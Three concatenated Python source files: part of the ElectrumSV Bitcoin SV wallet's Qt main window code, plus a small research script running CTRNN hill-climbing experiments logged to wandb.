vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
2021-08-10.py
|
from job.nwalker import NWalker
from multiprocessing import Process
from random import randint
from util.run import Run
import wandb
from job.nclimber import NClimber
from rl_ctrnn.ctrnn import Ctrnn
COLORS = {
1: "red",
2: "orange",
3: "yellow",
4: "lime",
6: "green",
8: "teal",
9: "cyan",
12: "blue",
18: "purple",
24: "magenta",
}
FITNESS = 0.5656714076031992
DURATION = 7200
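# Hand-tuned two-neuron CTRNN used as the shared starting point (progenitor) for every run below.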
PROGENITOR = {
"time_constants": {0: 1.0, 1: 1.0},
"biases": {0: 5.154455202973727, 1: -10.756384207938911},
"weights": {
0: {0: 5.352730101212875, 1: 16.0},
1: {0: -11.915400080418113, 1: 2.7717190607157542},
},
}
def fmt(samples: int) -> str:
zero = "0" if samples < 10 else ""
return zero + str(samples) + " sample" + ("" if samples == 1 else "s")
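# Each part_* function runs one experiment from the progenitor and streams best-so-far fitness to
# wandb; "Time" accumulates simulated evaluation seconds (duration * samples per step) up to DURATION.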
def part_a(samples: int = 1, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="a2",
job_type=fmt(samples),
config={"samples": samples, "seed": seed},
)
c = NClimber(progenitor, seed=seed, duration=10, samples=samples)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
run.finish()
def part_b(samples: int = 1, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="b",
job_type=fmt(samples),
config={"samples": samples, "seed": seed},
)
c = NClimber(
progenitor, seed=seed, duration=10, samples=samples, mutation=0.05 * samples
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
run.finish()
def part_c(mutation: float = 0.05, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="c",
job_type=fmt(8),
config={"samples": 8, "seed": seed, "mutation": mutation},
)
c = NClimber(
progenitor, seed=seed, duration=10, samples=8, mutation=mutation
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
run.finish()
def part_f(mutation: float = 0.05, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="f2",
job_type=fmt(8),
config={"samples": 1, "seed": seed, "mutation": mutation},
)
c = NClimber(
progenitor, seed=seed, duration=10, samples=1, mutation=mutation
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
data = {"Time": a, "fitness": c.attempts[c.best][1]}
ctrnn = c.attempts[c.best][0]
for y in range(ctrnn.size):
for x in range(ctrnn.size):
data[f"weight.{x}.{y}"] = ctrnn.weights[x, y]
run.log(data)
run.finish()
def part_g(mutation: float = 0.05, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="g",
job_type=fmt(8),
config={"samples": 1, "seed": seed, "mutation": mutation},
)
c = NWalker(
progenitor, seed=seed, duration=10, samples=1, mutation=mutation
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
data = {"Time": a, "fitness": c.attempts[c.best][1]}
ctrnn = c.attempts[c.best][0]
for y in range(ctrnn.size):
for x in range(ctrnn.size):
data[f"weight.{x}.{y}"] = ctrnn.weights[x, y]
run.log(data)
run.finish()
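# Spawn one process per value in the sweep list; every process in a batch shares the same random
# seed so runs are directly comparable across parameter settings.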
if __name__ == "__main__":
loops = 10.0
for n in range(int(loops)):
print(n / loops)
threads = []
seed = randint(11, 50000)
for i in [0.05, 0.1, 0.5, 1, 2, 3, 4, 5]:
threads.append(Process(target=part_a, args=(i, seed)))
        for p in threads:
            p.start()
        for p in threads:
            p.join()
|
main_window.py
|
# ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
# Copyright (C) 2019 ElectrumSV developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import base64
from collections import Counter
import csv
from decimal import Decimal
from functools import partial
import json
import os
import shutil
import threading
import time
from typing import Iterable, Tuple
import weakref
import webbrowser
from bitcoinx import PublicKey, Script, Address, P2PKH_Address, TxOutput
from bitcoinx import OP_RETURN # pylint: disable=no-name-in-module
from PyQt5.QtCore import (pyqtSignal, Qt, QRect, QSize, QStringListModel, QTimer, QUrl)
from PyQt5.QtGui import QKeySequence, QCursor, QDesktopServices
from PyQt5.QtWidgets import (
QPushButton, QMainWindow, QTabWidget, QSizePolicy, QShortcut, QFileDialog, QMenuBar,
QMessageBox, QGridLayout, QLineEdit, QLabel, QComboBox, QHBoxLayout,
QVBoxLayout, QWidget, QCompleter, QMenu, QTreeWidgetItem, QTextEdit,
QInputDialog, QDialog, QToolBar, QAction, QPlainTextEdit, QTreeView
)
import electrumsv
from electrumsv import bitcoin, commands, keystore, paymentrequest, qrscanner, util
from electrumsv.app_state import app_state
from electrumsv.bitcoin import COIN, is_address_valid
from electrumsv.exceptions import NotEnoughFunds, UserCancelled, ExcessiveFee
from electrumsv.i18n import _
from electrumsv.keystore import Hardware_KeyStore
from electrumsv.logs import logs
from electrumsv.network import broadcast_failure_reason
from electrumsv.networks import Net
from electrumsv.paymentrequest import PR_PAID
from electrumsv.transaction import (
Transaction, tx_from_str, tx_output_to_display_text,
)
from electrumsv.util import (
format_time, format_satoshis, format_satoshis_plain, bh2u, format_fee_satoshis,
get_update_check_dates, get_identified_release_signers, profiler
)
from electrumsv.version import PACKAGE_VERSION
from electrumsv.wallet import Multisig_Wallet, sweep_preparations
import electrumsv.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit
from .contact_list import ContactList, edit_contact_dialog
from .coinsplitting_tab import CoinSplittingTab
from . import dialogs
from .preferences import PreferencesDialog
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import TxDialog
from .util import (
MessageBoxMixin, ColorScheme, HelpLabel, expiration_values, ButtonsLineEdit,
WindowModalDialog, Buttons, CopyCloseButton, MyTreeWidget, EnterButton,
WaitingDialog, ChoicesLayout, OkButton, WWLabel, read_QIcon,
CloseButton, CancelButton, text_dialog, filename_field, address_combo,
update_fixed_tree_height, UntrustedMessageDialog
)
from .wallet_api import WalletAPI
logger = logs.get_logger("mainwindow")
class ElectrumWindow(QMainWindow, MessageBoxMixin):
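    # Qt signals used to marshal events from network / worker threads back onto the GUI thread.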
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
network_status_signal = pyqtSignal(object)
def __init__(self, wallet):
QMainWindow.__init__(self)
self._api = WalletAPI(self)
self.logger = logger
self.config = app_state.config
self.wallet = wallet
self.network = app_state.daemon.network
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.app = app_state.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.require_fee_update = False
self.tx_notifications = []
self.tx_notify_timer = None
self.tx_dialogs = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.fee_unit = self.config.get('fee_unit', 0)
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.coinsplitting_tab = self.create_coinsplitting_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"),
_("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"),
_("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"),
_("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"),
_("Con&sole"), "console")
add_optional_tab(tabs, self.coinsplitting_tab, read_QIcon("tab_coins.png"),
_("Coin Splitting"), "coinsplitter", True)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
# Some tabs may want to be refreshed to show current state when selected.
def on_tab_changed(to_tab_index):
current_tab = self.tabs.currentWidget()
if current_tab is self.coinsplitting_tab:
self.coinsplitting_tab.update_layout()
self.tabs.currentChanged.connect(on_tab_changed)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
self.init_toolbar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
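        # Alt+1..Alt+N jump straight to a tab; i is bound as a default argument so each lambda
        # captures its own index rather than the loop variable.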
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self,
lambda i=i: wrtabs.setCurrentIndex(i))
self.network_status_task = app_state.async_.spawn(self.maintain_network_status)
self.network_status_signal.connect(self.update_network_status)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.main_server.state.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
self.load_wallet()
self.app.timer.timeout.connect(self.timer_actions)
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
# inform things like address_dialog that there's a new history
self.history_updated_signal.emit()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if app_state.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit()
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_exception(self, exception):
if not isinstance(exception, UserCancelled):
self.logger.exception("")
self.show_error(str(exception))
def on_error(self, exc_info):
self.on_exception(exc_info[1])
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
elif event == 'new_transaction':
tx, wallet = args
if wallet == self.wallet: # filter out tx's not for this wallet
self.tx_notifications.append(tx)
self.notify_transactions_signal.emit()
self.need_update.set()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.debug("unexpected network message event='%s' args='%s'", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(self.network.main_server.state.banner)
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
pass
else:
self.logger.debug("unexpected network_qt signal event='%s' args='%s'", event, args)
def load_wallet(self):
wallet = self.wallet
self.logger = logs.get_logger("mainwindow[{}]".format(self.wallet.basename()))
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the
# callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.app.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
self.history_updated_signal.emit()
wallet.create_gui_handlers(self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.debug("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = f'ElectrumSV {PACKAGE_VERSION} ({Net.NAME}) - {self.wallet.basename()}'
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin SV with it."),
_("Make sure you own the seed phrase or the private keys, "
"before you request Bitcoin SV to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.app.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(
self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")
+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("ElectrumSV was unable to copy your wallet file "
"to the specified location.") + "\n" + str(reason),
title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)][:10]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
basenames = [os.path.basename(path) for path in recent]
counts = Counter(basenames)
pairs = sorted((basename if counts[basename] == 1 else path, path)
for basename, path in zip(basenames, recent))
for menu_text, path in pairs:
self.recently_visited_menu.addAction(menu_text, partial(self.app.new_window, path))
self.recently_visited_menu.setEnabled(bool(pairs))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.app.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
if Net.NAME in ("testnet", "scalingtestnet"):
def temp_func():
from importlib import reload
from . import wallet_wizard
reload(wallet_wizard)
wallet_wizard.open_wallet_wizard()
wallet_menu.addAction(_("&New Wizard"), temp_func)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"),
self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"),
self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"),
self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), partial(edit_contact_dialog, self._api))
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), self.invoice_list.import_invoices)
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.coinsplitting_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
tools_menu.addAction(_("Preferences"), self.preferences_dialog)
tools_menu.addAction(_("&Network"), lambda: self.app.show_network_dialog(self))
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.do_process_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrumsv.io"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"),
lambda: webbrowser.open("http://electrumsv.readthedocs.io/")
).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def init_toolbar(self):
self.toolbar = toolbar = QToolBar(self)
        icon_size = int(self.app.dpi / 5.8)
toolbar.setMovable(False)
toolbar.setIconSize(QSize(icon_size, icon_size))
toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
make_payment_action = QAction(read_QIcon("icons8-initiate-money-transfer-80.png"),
_("Make Payment"), self)
make_payment_action.triggered.connect(self.new_payment)
toolbar.addAction(make_payment_action)
spacer = QWidget(self)
spacer.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
spacer.setVisible(True)
self.spacer_action = toolbar.addWidget(spacer)
log_action = QAction(read_QIcon("icons8-moleskine-80.png"), _("Log Viewer"), self)
log_action.triggered.connect(self.app.show_log_viewer)
toolbar.addAction(log_action)
network_action = QAction(read_QIcon("network.png"), _("Network"), self)
network_action.triggered.connect(lambda: self.app.show_network_dialog(self))
toolbar.addAction(network_action)
preferences_action = QAction(read_QIcon("preferences.png"), _("Preferences"), self)
preferences_action.triggered.connect(self.preferences_dialog)
toolbar.addAction(preferences_action)
self._update_check_state = "default"
update_action = QAction(
read_QIcon("icons8-available-updates-80-blue"), _("Update Check"), self)
def _update_show_menu(checked: bool = False):
self._update_menu.exec(QCursor.pos())
update_action.triggered.connect(_update_show_menu)
self._update_action = update_action
toolbar.addAction(update_action)
self._update_check_toolbar_update()
toolbar.insertSeparator(update_action)
self.addToolBar(toolbar)
self.setUnifiedTitleAndToolBarOnMac(True)
def add_toolbar_action(self, action: QAction) -> None:
self.toolbar.insertAction(self.spacer_action, action)
def _update_check_toolbar_update(self):
update_check_state = "default"
check_result = self.config.get('last_update_check')
stable_version = "?"
if check_result is not None:
# The latest stable release date, the date of the build we are using.
stable_result = check_result["stable"]
stable_signers = get_identified_release_signers(stable_result)
if stable_signers:
release_date, current_date = get_update_check_dates(stable_result["date"])
if release_date > current_date:
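                    # A release less than a day old is shown as a fresh ("immediate") update;
                    # anything older escalates to the "prolonged" state.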
if time.time() - release_date.timestamp() < 24 * 60 * 60:
update_check_state = "update-present-immediate"
else:
update_check_state = "update-present-prolonged"
stable_version = stable_result["version"]
def _on_check_for_updates(checked: bool=False):
self.show_update_check()
def _on_view_pending_update(checked: bool=False):
QDesktopServices.openUrl(QUrl("https://electrumsv.io/#downloads"))
menu = QMenu()
self._update_menu = menu
self._update_check_action = menu.addAction(
_("Check for Updates"), _on_check_for_updates)
if update_check_state == "default":
icon_path = "icons8-available-updates-80-blue"
icon_text = _("Updates")
tooltip = _("Check for Updates")
menu.setDefaultAction(self._update_check_action)
elif update_check_state == "update-present-immediate":
icon_path = "icons8-available-updates-80-yellow"
icon_text = f"{stable_version}"
tooltip = _("A newer version of ElectrumSV is available, and "+
"was released on {0:%c}").format(release_date)
self._update_view_pending_action = menu.addAction(
_("View Pending Update"), _on_view_pending_update)
menu.setDefaultAction(self._update_view_pending_action)
elif update_check_state == "update-present-prolonged":
icon_path = "icons8-available-updates-80-red"
icon_text = f"{stable_version}"
tooltip = _("A newer version of ElectrumSV is available, and "+
"was released on {0:%c}").format(release_date)
self._update_view_pending_action = menu.addAction(
_("View Pending Update"), _on_view_pending_update)
menu.setDefaultAction(self._update_view_pending_action)
# Apply the update state.
self._update_action.setMenu(menu)
self._update_action.setIcon(read_QIcon(icon_path))
self._update_action.setText(icon_text)
self._update_action.setToolTip(tooltip)
self._update_check_state = update_check_state
def on_update_check(self, success, result):
if success:
stable_result = result["stable"]
stable_signers = get_identified_release_signers(stable_result)
if stable_signers:
# The latest stable release date, the date of the build we are using.
stable_date_string = stable_result["date"]
release_date, current_date = get_update_check_dates(stable_date_string)
if release_date > current_date:
self.app.tray.showMessage(
"ElectrumSV",
_("A new version of ElectrumSV, version {}, is available for download")
.format(stable_result["version"]),
read_QIcon("electrum_dark_icon"), 20000)
self._update_check_toolbar_update()
def new_payment(self):
from . import payment
from importlib import reload
reload(payment)
self.w = payment.PaymentWindow(self._api, parent=self)
self.w.show()
def donate_to_server(self):
server = self.network.main_server
addr = server.state.donation_address
if is_address_valid(addr):
addr = Address.from_string(addr)
self.pay_to_URI(web.create_URI(addr, 0, _('Donation for {}').format(server.host)))
else:
self.show_error(_('The server {} has not provided a valid donation address')
.format(server))
def show_about(self):
QMessageBox.about(self, "ElectrumSV",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("ElectrumSV's focus is speed, with low resource usage and simplifying "
"Bitcoin SV. You do not need to perform regular backups, because your "
"wallet can be recovered from a secret phrase that you can memorize or "
"write on paper. Startup times are instant because it operates in "
"conjunction with high-performance servers that handle the most complicated "
"parts of the Bitcoin SV system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self):
from . import update_check
update_check.UpdateCheckDialog()
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/ElectrumSV/ElectrumSV/issues"
"\">https://github.com/ElectrumSV/ElectrumSV/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of ElectrumSV "
"(latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="ElectrumSV - " + _("Reporting Bugs"))
last_notify_tx_time = 0.0
notify_tx_rate = 30.0
def notify_tx_cb(self):
n_ok = 0
if self.network and self.network.is_connected() and self.wallet:
num_txns = len(self.tx_notifications)
if num_txns:
# Combine the transactions
total_amount = 0
for tx in self.tx_notifications:
if tx:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0 and is_relevant:
total_amount += v
n_ok += 1
if n_ok:
self.logger.debug("Notifying GUI %d tx", n_ok)
if n_ok > 1:
self.notify(_("{} new transactions received: Total amount received "
"in the new transactions {}")
.format(n_ok, self.format_amount_and_units(total_amount)))
else:
self.notify(_("New transaction received: {}").format(
self.format_amount_and_units(total_amount)))
self.tx_notifications = list()
self.last_notify_tx_time = time.time() if n_ok else self.last_notify_tx_time
if self.tx_notify_timer:
self.tx_notify_timer.stop()
self.tx_notify_timer = None
def notify_transactions(self):
if self.tx_notify_timer or not len(self.tx_notifications) or self.cleaned_up:
# common case: extant notify timer -- we already enqueued to notify. So bail
# and wait for timer to handle it.
return
